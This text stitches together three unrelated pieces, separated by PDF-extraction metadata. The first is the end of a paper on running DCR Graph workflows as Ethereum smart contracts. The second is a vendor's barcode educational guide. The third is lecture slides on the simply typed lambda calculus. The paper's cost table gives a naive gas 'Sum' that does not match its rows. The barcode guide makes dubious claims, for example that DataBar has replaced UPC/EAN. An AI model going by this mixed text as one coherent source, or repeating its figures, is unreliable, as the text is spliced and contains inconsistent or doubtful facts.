The mono-contract provides access control by accepting, on workflow creation, a list of public keys/addresses that are authorised to subsequently execute events; the implementation manually checks that the caller is authorised before executing an event. Because state in Ethereum can only be changed through contract calls, this mechanism provides complete mediation: there is no way to alter the state of running workflows without going through the contract operations. Returning to the code for the enabledness computation in Listing 1, we see access control computed in lines 7–10, using the Ethereum-provided \texttt{msg.sender} constant.

As mentioned, workflow creation is an order of magnitude cheaper in the optimised implementation. Moreover, in the naive implementation, workflow creation is two orders of magnitude more expensive than event executions; in the optimised implementation only one.

### Table 2: Cost comparison, naive and optimised implementation.

<table>
<thead>
<tr>
<th>Event</th>
<th>Naive GAS</th>
<th>Naive USD*</th>
<th>Optimised GAS</th>
<th>Optimised USD*</th>
</tr>
</thead>
<tbody>
<tr>
<td>1. Initialisation\(^\star\)</td>
<td>2,185,061</td>
<td>14.582</td>
<td>717,709</td>
<td>4.790</td>
</tr>
<tr>
<td>2. Propose - DU</td>
<td>61,126</td>
<td>0.408</td>
<td>66,293</td>
<td>0.442</td>
</tr>
<tr>
<td>3. Propose - DE</td>
<td>62,592</td>
<td>0.418</td>
<td>52,615</td>
<td>0.351</td>
</tr>
<tr>
<td>4. Accept - DU</td>
<td>46,126</td>
<td>0.308</td>
<td>51,293</td>
<td>0.342</td>
</tr>
<tr>
<td>5. Accept - DE</td>
<td>46,226</td>
<td>0.308</td>
<td>52,615</td>
<td>0.351</td>
</tr>
<tr>
<td>6. Hold Meeting</td>
<td>37,353</td>
<td>0.249</td>
<td>49,665</td>
<td>0.331</td>
</tr>
<tr>
<td><strong>Sum</strong></td>
<td>2,392,258</td>
<td>16.273</td>
<td>990,190</td>
<td>6.608</td>
</tr>
</tbody>
</table>

\(^*\) Prices in USD are computed from average Gas- and Ether prices at the time of writing [13, 14].

\(^\star\) Prices for the naive implementation include contract creation and workflow creation; prices for the optimised implementation include only workflow creation.

6. IMPLEMENTATION

We have implemented a software tool which converts a DCR Graph to a Solidity smart contract.
To show that our DCR engine can be used in practice, we have implemented a graphical user interface (GUI), where users can create workflows and execute activities on a deployed Ethereum contract. We host the source code of the contracts at https://github.com/DCREum/dcreum.github.io for perusal, and the GUI for anyone to use at https://dcreum.github.io. An Ethereum node and client are required to view and use the GUI. We recommend Parity alongside the Google Chrome extension Parity Ethereum Integration. Multiple high-level languages compiling to EVM bytecode exist; our implementation was done in the statically typed object-oriented language Solidity. However, compared to mainstream programming languages, in EVM/Solidity we have to contend additionally with quirks of the Solidity interpreter. For example, Solidity limits the number of variables allowed in scope at one time, as these are always kept on the stack, and the EVM only allows access to the 16 top-most items [42]. Other limitations include externally available functions not being allowed structs or nested arrays as arguments or return type. Ethereum execution causes a delay in event execution, as the network has to process and accept such an execution. We can have the acceptance of a transaction (event execution) prioritised by offering above-market Gas prices. Unless we send the request at almost exactly the same time of new block propagation, in experiments run late spring 2017, our requests have been included in the next mined block when paying market Gas prices. However, even though a block is accepted, it may still find itself on a less difficult chain, and thus eventually discarded. In general, like in Bitcoin and other blockchain-based transactional systems, one must wait some number of blocks before one can reasonably assume that the transaction is permanently included. The frequency of event executions is bounded by the (dynamic) Gas limit [42]. This limit is currently at 6,718,941, which for the DU/DE example (Figure 1) in theory would allow between 101 and 135 executions, depending on the exact activity executed. If we consider instead single-participant, non-concurrent executions, the limit is the mining time, which should average 12 seconds, although at the time of writing, the average for the last 5000 blocks is ca. 30 seconds. In general, it has been our experience that mining time varies between a few seconds and several minutes. We estimate we have seen an average of 1-2 executions per minute at market Gas prices. 7. CONCLUSION We have demonstrated how to implement distributed declarative workflow execution in an adversarial setting, without the assistance of a trusted third party, by implementing DCR Graph declarative process models as Solidity contracts running on the Ethereum blockchain. Within the the security guarantees given by this blockchain, this implementation guarantees that the execution does follow the agreed-upon workflow—the DCR Graph—(I) and that the sequence of executions recorded on the blockchain is incontrovertibly the actual recorded history (II). Cost is an issue, both because an adversary must be prevented from inflicting cost on an honest party, and because cost of contract execution is high enough that we must optimise. Particularly helpful optimisations are the mono-contract and bitvector representation of sets and relations. We have demonstrated the economic feasibility of the implementation: see actual costs in Table 2. 
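To connect the cost figures in Table 2 with the throughput bound discussed in Section 6: dividing the quoted block Gas limit of 6,718,941 by the most and least expensive per-event costs of the optimised implementation (Propose - DU at 66,293 Gas, Hold Meeting at 49,665 Gas) indeed gives the 101 to 135 executions per block cited there:

\[
\left\lfloor \frac{6{,}718{,}941}{66{,}293} \right\rfloor = 101,
\qquad
\left\lfloor \frac{6{,}718{,}941}{49{,}665} \right\rfloor = 135.
\]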
Moreover, we have discussed bounds on delay and frequency of event executions in Section 6, estimating that the Ethereum blockchain can likely sustain 1-2 executions per minute at market prices.

\(^2\)This contract was created in the transaction [12] at a cost of 2,976,162 Gas/USD 8.73.

8. REFERENCES

[12] Mono-contract creation transaction. https://etherscan.io/tx/0x003fb07eb74b4a2557dc48fa8e7799e481098e0c4ed0857ce646dbe3b9b90cda.
{"Source-Url": "https://static-curis.ku.dk/portal/files/194806456/fab18_submission_06.pdf", "len_cl100k_base": 7271, "olmocr-version": "0.1.53", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 29284, "total-output-tokens": 10439, "length": "2e12", "weborganizer": {"__label__adult": 0.0004854202270507813, "__label__art_design": 0.0004837512969970703, "__label__crime_law": 0.0011415481567382812, "__label__education_jobs": 0.0009675025939941406, "__label__entertainment": 0.0001417398452758789, "__label__fashion_beauty": 0.0002301931381225586, "__label__finance_business": 0.00260162353515625, "__label__food_dining": 0.0004589557647705078, "__label__games": 0.0009641647338867188, "__label__hardware": 0.0015039443969726562, "__label__health": 0.0008478164672851562, "__label__history": 0.00046896934509277344, "__label__home_hobbies": 0.0001823902130126953, "__label__industrial": 0.0010042190551757812, "__label__literature": 0.0004265308380126953, "__label__politics": 0.0007143020629882812, "__label__religion": 0.0005350112915039062, "__label__science_tech": 0.3349609375, "__label__social_life": 0.00016677379608154297, "__label__software": 0.0195770263671875, "__label__software_dev": 0.630859375, "__label__sports_fitness": 0.00029850006103515625, "__label__transportation": 0.000736236572265625, "__label__travel": 0.00024819374084472656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 38999, 0.03961]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 38999, 0.23323]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 38999, 0.88996]], "google_gemma-3-12b-it_contains_pii": [[0, 548, false], [548, 4784, null], [4784, 8557, null], [8557, 13996, null], [13996, 19563, null], [19563, 25244, null], [25244, 31997, null], [31997, 37574, null], [37574, 38999, null]], "google_gemma-3-12b-it_is_public_document": [[0, 548, true], [548, 4784, null], [4784, 8557, null], [8557, 13996, null], [13996, 19563, null], [19563, 25244, null], [25244, 31997, null], [31997, 37574, null], [37574, 38999, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 38999, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 38999, null]], "pdf_page_numbers": [[0, 548, 1], [548, 4784, 2], [4784, 8557, 3], [8557, 13996, 4], [13996, 19563, 5], [19563, 25244, 6], [25244, 31997, 7], [31997, 37574, 8], [37574, 38999, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 38999, 0.06466]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
f51c62bed9619d0cdfb904752f78ceff7c3125f4
IDAutomation.com, Inc. IDAutomation.com, Inc. and Benjamin Johnson, Technical Support & Development BARCODE EDUCATIONAL GUIDE The Barcode Educational Guide provides an introduction to IDAutomation Barcode Products, barcode symbologies, and symbology standards. What products do we offer? - IDAutomation provides automation components to generate barcodes including: Barcode Applications (stand-alone applications: Image Generator and Label Software Application) Fonts (Barcode, MICR, OCR, and Security Fonts similar to Times New Roman, Arial, and Courier New) Barcode Components (ActiveX Controls, and other Development Components –Java, .NET DLLs) Please view the Barcoding for Beginners video: [http://www.youtube.com/watch?v=CJW5D5SDAgw](http://www.youtube.com/watch?v=CJW5D5SDAgw) - IDAutomation provides hardware including: Barcode Scanners and Printers. We are a reseller of most scanners and printers. However, our in-house hardware includes: SC5USBD (USB Wired Scanner compatible with Windows, Linux, UNIX, Mac) SC5USBW (Wireless Scanner with USB Cradle connection compatible with Windows, Linux, UNIX, Mac) SC7USB 2D (USB Wired 2D Scanner) The above scanners are privately labeled to us by Argox, the one below is from Cipher: SC1500 (USB Wired Scanner compatible with Windows, Linux, UNIX, Mac) Some of the vendors that we work with include: Datamax, Honeywell, Symbol Technologies, Metrologic, Zebra, and Intermec. [The full list of vendors](#). - As a reseller, IDAutomation provides Inventory Tracking and Point of Sales solutions including: Red Beam Inventory Tracking Software How do barcodes work? A **barcode is designed to eliminate manual entry and error.** Imagine an employee working in a data entry facility that manually enters (keyboard entry) customer ID numbers from an ID card into a database search to pull up customer information. Manually entering hundreds of ID numbers could take a tremendous amount of time and may even cause entry errors. In this situation, a barcode can be used. The user can generate barcodes of all customer ID numbers and print the information on the ID card, then use a scanner to scan the barcode and quickly process the information as if it were being typed into the database search. To generate the barcode, use a barcode font, component, or application. To scan the barcode, use a hand held or software barcode scanner. Once the barcode is created, connect the scanner to the computer or device, open an application (text editor or browser) and scan the barcode. The data will appear where the cursor resides. The process is very similar to using a keyboard to manually enter information into a text area. A question asked by many users that create and scan barcodes is, “How does the scanner know when to begin and end a barcode scan?” There are special characters designated as start/stop characters that appear at the beginning and end of a barcode. It informs the barcode scanner when to begin and end a scan. In the case of the database entry search, the scanner simply places the data into a particular field that is used for a search. The application handles the data it receives. Barcode Applications Barcode Applications are barcode products that may be used to generate barcode images (JPEG, BMP, GIF, etc). The applications are stand-alone products that are more user-friendly than Fonts and Components. IDAutomation sells two popular barcoding applications and is a reseller of another. 
The Barcode Label Software

The Barcode Label Software is barcode label printing software with a user-friendly label design interface. This product includes three versions: Free Version, Standard Version and Pro Version (which generates 2D barcodes and connects to advanced database systems). The software can generate barcode labels based on data directly entered into the software (as embedded data) or link data from other sources (external data), such as an Excel spreadsheet, CSV file, or database table. Predefined labels can be selected or custom labels can be created. Labels can be printed to thermal and laser printers. Compatible with Windows only.

Further Reference: Product Page User Manual

IDAutomation is also a reseller of Niceware’s NiceLabel Software. It is very similar to our Barcode Label Software but has a few more features, including RFID. It is supported by Niceware International.

The Barcode Image Generator

The IDAutomation Barcode Image Generator is a barcode image generation application that creates barcodes one at a time or many at a time using the user interface or command line. It supports JPEG, EPS, TIFF, PNG, BMP, WMF and 1 bit per pixel monochrome bitmap image formats. It is one of the easiest products to use. Barcode data, type, height, color, margins and width can be modified. Compatible with Windows and Mac. The software can import TEXT files to generate multiple barcodes. Supports several barcode types: Linear and 2D barcodes.

Further Reference: - Product Page - User Manual

Barcode, OCR, MICR, and Security Fonts

**Barcode fonts** are font files that create barcodes—this is the most popular method for creating barcodes.

**OCR program fonts** are used for several purposes where automated systems need a standard character shape defined to properly read text without the use of barcodes. Some examples of OCR program font implementations include bank checks, passports, serial labels and postal mail.

**Security fonts** are used to print secure text, names and currency amounts on highly secure documents, such as a bank check, in a manner that cannot be easily altered and may prevent forgery.

**MICR E13B** and **MICR CMC7 fonts** are special fonts used on bank checks and drafts to print characters for magnetic recognition and optical character recognition systems.

**About Barcode Fonts**

Of the four font types available from IDAutomation, barcode fonts are the most complex. Unlike fonts such as Times New Roman, Arial, MICR, and Courier New, barcode fonts require an extra step to ensure that the created barcode is scannable. In order to create a scannable barcode, the data must pass through a calculation tool known as a font encoder (font tool). The font tool produces an output that includes start/stop characters, guard bars (for UPC and EAN), check digit, and encoded data. Start/Stop characters identify the beginning and end of a barcode. Check Digits ensure that the barcode is properly created. Encoded data is data in the form that only barcode fonts can understand.

Imagine that you need to bake a cake for your cousin’s birthday party. You (the barcode creator) can think of your data as the cake mix, the font tool as the cooking tools (spoon, bowl, and oven), and the barcode font as the icing for the cake.

The Font Tool / Font Encoder

The cake mix (data) must be mixed and baked (passed through the font tool) using the tools and oven. Once the cake has baked (encoded data), the last step is to apply the icing (barcode font).
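To make the font-encoder steps concrete, here is a small, illustrative OCaml sketch (ours, not IDAutomation's encoder logic): a GS1-style mod-10 check digit of the kind used by UPC and EAN barcodes, and a minimal Code 39 step that just adds the asterisk start/stop characters (Code 39 is self-checking, so no check digit is required).

```ocaml
(* Mod-10 check digit used by UPC-A/EAN-13: weight the data digits 3,1,3,1,...
   starting from the rightmost one, sum them, and take (10 - sum mod 10) mod 10. *)
let mod10_check_digit (data : string) : int =
  let n = String.length data in
  let sum = ref 0 in
  for i = 0 to n - 1 do
    let d = Char.code data.[n - 1 - i] - Char.code '0' in
    sum := !sum + d * (if i mod 2 = 0 then 3 else 1)
  done;
  (10 - !sum mod 10) mod 10

(* A minimal Code 39 "font encoder" step: wrap the data in start/stop asterisks. *)
let encode_code39 (data : string) : string = "*" ^ data ^ "*"

(* Examples: mod10_check_digit "03600029145" = 2, giving the UPC-A 036000291452;
   encode_code39 "ID-123" = "*ID-123*". *)
```

A real font encoder additionally maps this result onto the character set of the specific barcode font; that mapping is product-specific and is not reproduced here.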
Here is another example: <table> <thead> <tr> <th>Data</th> <th>Data Encoded</th> <th>Data with Barcode Font Applied</th> </tr> </thead> <tbody> <tr> <td>12345678901</td> <td>ÊBxzÈ1sÍ</td> <td></td> </tr> </tbody> </table> Further Reference: Barcode Fonts Font Encoders Barcode Components Barcode Components are products that integrate into applications and development environments to generate barcodes as images. For example, the Barcode Image Generator and Barcode Label Software are built by using the IDAutomation .NET Forms Control (integrated into the applications). These products are the most complex to use and are generally recommended for Developers that want to integrate barcodes into their applications (custom applications). Components are in the form of DLLs, class files, and other component files. Barcode Components include Web, Application and Native Generator products: - **.NET Forms Control** (used in Visual Studio .NET) - **ActiveX Control** - **Reporting Services CRI** (used in SSRS) - **ASP Server Component for IIS** - **Java Component** - **ASP.NET Server Control** (for Web Development) - **Hosted Service** (IDAutomation provides service to host barcode on Web Server) - **Native Generators** About Native Generators: Developed by IDAutomation.com, Inc., Native Generators are components that generate barcodes without using barcode fonts, DLLs, or plug-ins. It is code that builds the barcode using Unicode and system fonts. Native Generator products have been developed for Crystal Reports, Javascript, Oracle Reports, Access, FileMaker, Google Docs, PHP, ASP, and ASPX. Barcode Symbologies A symbology/barcode type is a protocol for arranging the bars and spaces that make up a particular kind of barcode. IDAutomation offers several symbologies as fonts, applications, and components. There are two major symbology types: - Linear Barcodes (1D) - Two-Dimensional Barcodes (2D). **Linear** Barcodes representing data in the widths (lines) and the spacing of parallel lines such as Code128, Code 39, and UPC, are referred to as Linear or 1D (one-dimensional) barcode symbologies. - Holds less than 85 characters (symbology specific character limit) - A majority of customers are set up to use Linear barcodes (Linear scanner). - Creates a wide barcode. **2D** Two-dimensional (2D) barcodes such as Data Matrix, PDF417, and QR Code, may have patterns of squares, dots, hexagons and other geometric patterns. While maintaining a fairly small size, these barcode types hold much more data than Linear barcodes. 2D barcodes can hold hundreds of characters. - Can hold hundreds of characters - Requires a 2D barcode scanner - With the same data, creates a smaller barcode than Linear Barcode Standards The type of barcode that should be used may depend on several variables, including: - Standards and mandates - Purpose and use - Data encoded - Printing and/or decoding methods There are several types of barcode standards for different purposes. Each type of symbology (or barcode type) is a standard that defines the printed symbol and how a device, such as a barcode scanner, reads and decodes the printed symbol. If an industry standard has already been established for the intended implementation, the standard should be implemented. For example, the distribution industry requires companies to place a UPC barcode on products that they distribute. If a standard does not exist for the chosen implementation, several symbologies are available to choose from. 
For example, if a warehouse employee wants to keep track of items in a warehouse using barcodes, he/she may not be required to select a particular barcode type or barcode standard. Industry standards are usually established when multiple parties or companies are involved in the ID process. The standard is not necessarily the same as the barcode symbology. Barcode standards define how to use the barcode symbology in a particular situation. For example, the two standards to create ISBN barcodes for books and generate ISSN barcodes for periodicals both use EAN-13 to encode data into the barcode, but have different methods depending on the specific ISBN & ISSN standards. Linear Barcodes Until recently, with the increased popularity of the 2D barcode QR Code, many people were only aware of Linear barcodes—identified by its vertical lines. Linear barcodes are very common and are used for several purposes in many industries. In this section, we will define and explain several of the most popular Linear barcode types including: - Code 39 (Code 3 of 9) - Code 128 - Interleaved 2 of 5 (I2 of 5) - UPCa and UPCe - EAN8 and EAN13 - Databar - Postnet - Intelligent Mail **Code 39** Code 39 (also known as the 3 of 9 Barcode, Code 3 of 9 and Barcode39) is a common barcode type used for various labels, such as name badges, inventory and industrial applications. The symbology of the Code 39 character set consists of barcode symbols representing numbers 0-9, upper-case letters A-Z, the space character and the following symbols: - . $ / + %. There is an Extended Code 39 that encodes lower case characters. The Code 39 barcode is the easiest of the alpha-numeric barcodes to use and is designed for character self-checking, thus eliminating the need for check character calculations. A check character is a character that is added to the end of a block of transmitted data and used to check the accuracy of the transmission. Further Reference: [Code 39 FAQ](#) Code 128 The Code 128 barcode is a high-density Linear symbology that encodes text, numbers, numerous functions and the entire 128 ASCII character set (from ASCII 0 to ASCII 128.) It is commonly used for several implementations; and is also referred to as ISBT-128, GS1-128, UCC-128, EAN-128 and USS Code 128 (barcodes standards for Code 128). It has three major character sets: Code 128 A, Code 128 B, and Code 128 C. A fourth set, Code 128 Auto, is the most efficient and uses a combination of A, B, and C. - Set A encodes numbers 0-9, uppercase A-Z, and control characters, and special characters. - Set B encodes numbers 0-9, uppercase A-Z, lowercase a-z, and special characters. - Set C encodes numeric data. Further Reference: Code 128 FAQ Interleaved 2 of 5 Interleaved 2 of 5 (ITF) is a numeric barcode used for encoding number pairs in a high-density barcode format. Interleaved 2 of 5 is designed for character self-checking, which eliminates the requirement for checksum characters; although checksum characters are required by some ITF specifications because they do maximize data integrity. ITF barcodes always contain an even number of digits, because a single ITF barcode character represents two numbers to achieve a higher density than other barcode types. The ITF barcode character set consists of barcode symbols representing double-digit characters 00 to 99 in addition to start and stop characters. 
The complete printed ITF barcode contains a leading quiet zone, a start pattern, Interleaved 2 of 5 barcode representing encoded data, a stop pattern and a trailing quiet zone which should be 10 times the width of the short bar, according to ANSI specifications. Further Reference: Common Question regarding Interleaved 2 of 5 I 2of 5 FAQ UPC, UPCE, EAN8, EAN13 UPC and EAN barcodes have been in use since the 1970s to encode Global Trade Item Numbers (GTIN), which uniquely identify a product for retail checkout or tracking purposes. UPC, UCC, EAN, JAN, GTIN-8, GTIN-12 and GTIN-13, ISBN and Bookland barcodes are all created from the same symbology type, commonly known as the UPC/EAN barcode. UPC and EAN barcodes appear on distributable items such as canned goods, magazines, books, and other products. A more advanced barcode type, Databar, has replaced UPC/EAN. Further Reference: [UPC/EAN FAQ](#) Databar The GS1 DataBar barcode symbology is the latest barcode type for space-constrained identification from GS1, formerly EAN International and the Uniform Code Council, Inc. DataBar barcodes have been utilized to solve many problems in POS, grocery and healthcare, where items are too small to allow for traditional barcode types, or where additional information needs to be encoded, such as product weight, expiration dates, country of origin or serial numbers. DataBar is also the only barcode symbology approved by GS1 to encode GTIN-14 numbers in all retail checkout systems. Further Reference: [Databar FAQ](#) Postnet The POSTNET (Postal Numeric Encoding Technique) barcode type was developed by the U. S. Post Office to encode zip code information. POSTNET barcodes on U.S. mail improve the speed, accuracy and delivery of mail. Some U.S. Post Offices also offer a discount for sending bulk mail that contains the POSTNET barcode. Further Reference: [USPS Postal FAQ](#) **Intelligent Mail** USPS Intelligent Mail (Aka: OneCode, the 4-State Customer Barcode, 4CB and USPS4CB) includes a height-modulated barcode designed for use in high speed, automated, mail sorting machines that allow both PLANET and POSTNET barcode information to be combined into a single barcode to track mailings, request address-quality services (including updated address-change information) and return-mail service. Further Reference: [Intelligent Mail FAQ](#) **Linear Barcode Facts** - Linear Barcodes use start and stop characters to determine the beginning and end of barcodes. - Linear Barcode cannot hold/encode an enormous amount of data. - Linear Barcode Scanners are less expensive than 2D Barcode Scanners. - Linear Barcodes may require a check character calculation. - Code 128 and Code 39 are very popular Linear barcodes types. - Code 128, Code 39, and Code 93 can encode alphanumeric data. - Code 39, Interleaved 2 of 5, and Postnet do not require check digits. - Planet is a Postal barcode type that is the reverse bar height of Postnet. - UPCe encodes eleven digits and produces an eight character barcode. - UPCA encodes eleven digits and produces a twelve character barcode. - SSCC18, SCC14, Intelligent Mail Container are standards of Code 128. - Interleaved 2 of 5 and Code 128 C encode numeric data in pairs. - Databar has several subsets including: Limited, Expanded, and Omni-Directional. Two Dimensional Barcodes (2D) Two-Dimensional Barcodes have been around a long time. However, the general public has recently become aware of them due to the rise of smart phones and mobile devices that scan the popular, QR Code. 
2D barcodes are identified by their square or rectangle shape. Some of the most well-known 2D barcodes include: - Data Matrix - QR Code - Aztec - PDF417 - Maxicode

Data Matrix

Data Matrix is a very efficient, two-dimensional (2D) barcode symbology that uses a small area of square modules with a unique perimeter pattern, which helps the barcode scanner determine cell locations and decode the symbol. Characters, numbers, text and actual bytes of data may be encoded, including Unicode characters and photos. The encoding and decoding process of Data Matrix is very complex. Several methods have been used for error correction in the past. All current implementations have been standardized on the ECC200 error correction method, which is approved by ANSI/AIM BC11 and the ISO/IEC 16022 specification. IDAutomation 2D Data Matrix barcode products all support ECC200 by default and are based on the ANSI/AIM BC11 and the ISO/IEC 16022 specifications. The Reed-Solomon error correction algorithms of ECC200 allow the recognition of barcodes that are up to 60% damaged. Error correction allows the barcode to sustain damage and still scan without error.

Further Reference: Data Matrix FAQ

**QR Code**

QR Code is a very efficient, two-dimensional (2D) barcode symbology that uses a small area of square modules with a unique perimeter pattern, which helps the barcode scanner determine cell locations and decode the QR Code symbol. Characters, numbers, text and actual bytes of data may be encoded, including Unicode characters and images. IDAutomation's implementation of QR Code is based on the ISO/IEC 18004:2006 standard. QR Codes are commonly used with smart-phone devices, such as the iPhone, Blackberry, Android and Windows 7 Phones, to direct users to additional information about a particular topic.

Further Reference: [QR-Code FAQ](#)

**Aztec**

Aztec barcodes are very efficient two-dimensional (2D) symbologies that use square modules with a unique finder pattern in the middle of the symbol, which helps the barcode scanner to determine cell locations to decode the symbol. Characters, numbers, text and bytes of data may be encoded in an Aztec barcode. The IDAutomation implementation of the Aztec barcode symbol is based on the ISO standard version released into the public domain by its inventor, Honeywell.

Further Reference: [Aztec FAQ](#)

**PDF417**

The PDF417 barcode is a two-dimensional (2D), high-density symbology capable of encoding text, numbers, files and actual data bytes. Large amounts of text and data can be stored securely and inexpensively when using the PDF417 barcode symbology. The printed symbol consists of several Linear rows of stacked codewords. Each codeword represents 1 of 929 possible values from one of three different clusters. A different cluster is chosen for each row, repeating after every three rows. Because the codewords in each cluster are unique, the scanner is able to determine what line each cluster is from. PDF417 uses Reed Solomon error correction instead of check digits. This error correction allows the symbol to endure some damage without causing loss of data.

Further Reference: PDF417 FAQ

Maxicode

Maxicode is an international 2D (two-dimensional) barcode that is currently used by UPS on shipping labels for world-wide addressing and package sortation. Maxicode symbols are fixed in size and are made up of offset rows of hexagonal modules arranged around a unique finder pattern. Maxicode includes error correction, which enables the symbol to be decoded when it is slightly damaged.
Maxicode symbols encode two messages; a primary message and a secondary message. The primary message usually encodes the postal code, country code and the class of service number. The secondary message usually encodes address data, but can encode other types of information as well. Further Reference: Maxicode FAQ Facts About 2D Barcodes - The Department of Defense uses Data Matrix Barcodes. - UPS uses Maxicode barcodes. - 2D Barcodes can encode hundreds of characters. - 2D Barcodes require a 2D scanner to scan them. - With the same data, 2D Barcodes, compared to Linear barcodes, are smaller. - Instead of check digits, 2D barcodes use Error Correction. - MicroPDF417 and MacroPDF417 are symbologies derived from PDF417. - Acuity CiMatrix / Siemens invented the Data Matrix ECC200 symbology and placed it in the public domain.
{"Source-Url": "http://www.idautomation.com/barcode-faq/barcode-educational-guide.pdf", "len_cl100k_base": 4832, "olmocr-version": "0.1.50", "pdf-total-pages": 18, "total-fallback-pages": 0, "total-input-tokens": 38381, "total-output-tokens": 5692, "length": "2e12", "weborganizer": {"__label__adult": 0.000705718994140625, "__label__art_design": 0.0021514892578125, "__label__crime_law": 0.0007939338684082031, "__label__education_jobs": 0.0011358261108398438, "__label__entertainment": 0.00018513202667236328, "__label__fashion_beauty": 0.00043582916259765625, "__label__finance_business": 0.005191802978515625, "__label__food_dining": 0.0005116462707519531, "__label__games": 0.0011854171752929688, "__label__hardware": 0.1365966796875, "__label__health": 0.0002734661102294922, "__label__history": 0.0003066062927246094, "__label__home_hobbies": 0.00046181678771972656, "__label__industrial": 0.00649261474609375, "__label__literature": 0.0002467632293701172, "__label__politics": 0.00018656253814697263, "__label__religion": 0.00066375732421875, "__label__science_tech": 0.0440673828125, "__label__social_life": 6.848573684692383e-05, "__label__software": 0.305419921875, "__label__software_dev": 0.49169921875, "__label__sports_fitness": 0.0002213716506958008, "__label__transportation": 0.0009050369262695312, "__label__travel": 0.0001854896545410156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21888, 0.02582]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21888, 0.67626]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21888, 0.86522]], "google_gemma-3-12b-it_contains_pii": [[0, 264, false], [264, 264, null], [264, 1634, null], [1634, 3197, null], [3197, 4424, null], [4424, 5048, null], [5048, 6814, null], [6814, 7300, null], [7300, 8642, null], [8642, 9758, null], [9758, 11221, null], [11221, 12518, null], [12518, 14285, null], [14285, 15839, null], [15839, 17261, null], [17261, 18678, null], [18678, 20109, null], [20109, 21888, null]], "google_gemma-3-12b-it_is_public_document": [[0, 264, true], [264, 264, null], [264, 1634, null], [1634, 3197, null], [3197, 4424, null], [4424, 5048, null], [5048, 6814, null], [6814, 7300, null], [7300, 8642, null], [8642, 9758, null], [9758, 11221, null], [11221, 12518, null], [12518, 14285, null], [14285, 15839, null], [15839, 17261, null], [17261, 18678, null], [18678, 20109, null], [20109, 21888, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21888, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 21888, null]], "pdf_page_numbers": [[0, 264, 1], [264, 264, 2], [264, 1634, 3], [1634, 3197, 4], [3197, 4424, 5], [4424, 5048, 6], [5048, 6814, 7], [6814, 7300, 
8], [7300, 8642, 9], [8642, 9758, 10], [9758, 11221, 11], [11221, 12518, 12], [12518, 14285, 13], [14285, 15839, 14], [15839, 17261, 15], [17261, 18678, 16], [18678, 20109, 17], [20109, 21888, 18]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21888, 0.01493]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
6170b0fc60bba5c34cc396b20ea0587b2c02a20c
Review

\[
\begin{align*}
e &::= \lambda x.\ e \mid x \mid e\ e \mid c \\
v &::= \lambda x.\ e \mid c \\
\tau &::= \text{int} \mid \tau \rightarrow \tau \\
\Gamma &::= \cdot \mid \Gamma, x : \tau
\end{align*}
\]

\[
(\lambda x.\ e)\ v \rightarrow e[v/x]
\qquad
\frac{e_1 \rightarrow e_1'}{e_1\ e_2 \rightarrow e_1'\ e_2}
\qquad
\frac{e_2 \rightarrow e_2'}{v\ e_2 \rightarrow v\ e_2'}
\]

\(e[e'/x]\): capture-avoiding substitution of \(e'\) for free \(x\) in \(e\)

\[
\Gamma \vdash c : \text{int}
\qquad
\Gamma \vdash x : \Gamma(x)
\qquad
\frac{\Gamma, x : \tau_1 \vdash e : \tau_2}{\Gamma \vdash \lambda x.\ e : \tau_1 \rightarrow \tau_2}
\qquad
\frac{\Gamma \vdash e_1 : \tau_2 \rightarrow \tau_1 \quad \Gamma \vdash e_2 : \tau_2}{\Gamma \vdash e_1\ e_2 : \tau_1}
\]

Preservation: If \(\cdot \vdash e : \tau\) and \(e \rightarrow e'\), then \(\cdot \vdash e' : \tau\).

Progress: If \(\cdot \vdash e : \tau\), then \(e\) is a value or \(\exists e'\) such that \(e \rightarrow e'\).

Adding Stuff

Time to use STLC as a foundation for understanding other common language constructs

We will add things via a *principled methodology* thanks to a *proper education*

- Extend the syntax
- Extend the operational semantics
  - Derived forms (syntactic sugar), or
  - Direct semantics
- Extend the type system
